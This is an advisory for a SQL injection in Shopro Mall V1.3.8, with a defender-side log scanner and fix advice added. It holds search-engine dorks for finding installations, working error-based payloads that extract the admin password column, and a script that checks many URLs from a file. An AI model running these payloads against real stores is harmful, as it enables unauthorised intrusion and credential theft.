Shopro Mall system V1.3.8 Value parameter has SQL injection

Shopro Mall system

Official website: https://shopro.top

GitHub: https://github.com/ITmonkey-cn/shopro.git

Search

shodan:http.title:"shopro" fofa:title="shopro"

Vulnerability Type

Error-Based SQL Injection

Vulnerability Version

V1.3.8

Reproduction environment:

  • ubuntu
  • python3.7

Vulnerability Description and Reproduction

  1. Open the browser developer tools (F12) to find something interesting.

  2. The goods_ids parameter triggers a SQL error message:

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
    
  3. Retrieve information with error-based SQL injection:

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
    

  4. PoC

    import requests

    # Suppress the TLS warnings caused by verify=False below.
    requests.packages.urllib3.disable_warnings()


    def poc(url):
        try:
            payload = "/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -"
            target = url + payload
            header = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'}
            response = requests.get(target, headers=header, timeout=5, verify=False)
            # An HTTP 500 whose body contains the MySQL "XPATH" error text
            # means the injected updatexml() call was executed.
            if response.status_code == 500 and "XPATH" in response.text:
                print(url + " is vulnerable")
        except Exception:
            # Ignore unreachable hosts and other request errors.
            pass


    def main():
        # url.txt holds one base URL per line.
        with open('url.txt', encoding='utf-8') as f:
            for i in f:
                poc(i.strip())


    if __name__ == '__main__':
        main()
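
A defender-side check for the request pattern shown in steps 2 and 3, as an added example that is not part of the original advisory or of the Shopro code: it scans access-log lines for requests to the lists endpoint whose goods_ids value is not a plain comma-separated list of integers. The combined log format, the assumption that legitimate goods_ids values are integer lists, and all function names are assumptions; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint path named in the advisory.
LISTS_PATH = "/addons/shopro/goods/lists"
# Assumption: a legitimate goods_ids value looks like "32" or "32,33,40".
ID_LIST = re.compile(r"\d+(?:,\d+)*", re.ASCII)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def is_valid_goods_ids(value):
    """True only for a comma-separated list of ASCII integers."""
    return ID_LIST.fullmatch(value) is not None


def suspicious_requests(log_lines):
    """Return (line_number, decoded goods_ids) for requests to the lists
    endpoint whose goods_ids is not a plain integer list."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        parts = urlsplit(match.group(1))
        if not parts.path.endswith(LISTS_PATH):
            continue
        # parse_qs percent-decodes, so encoded payloads are checked as well.
        for value in parse_qs(parts.query).get("goods_ids", []):
            if not is_valid_goods_ids(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2023:10:00:00 +0000] "GET /addons/shopro/goods/lists?page=1&goods_ids=32,33 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2023:10:00:07 +0000] "GET /addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--%20- HTTP/1.1" 500 1843',
    '203.0.113.5 - - [01/Jan/2023:10:00:09 +0000] "GET /addons/shopro/goods/detail?id=32 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: goods_ids={value!r}")
```

The same allow-list check, applied server-side before the value reaches the query, rejects the requests from steps 2 and 3; binding the IDs as query parameters instead of concatenating them removes the injection itself.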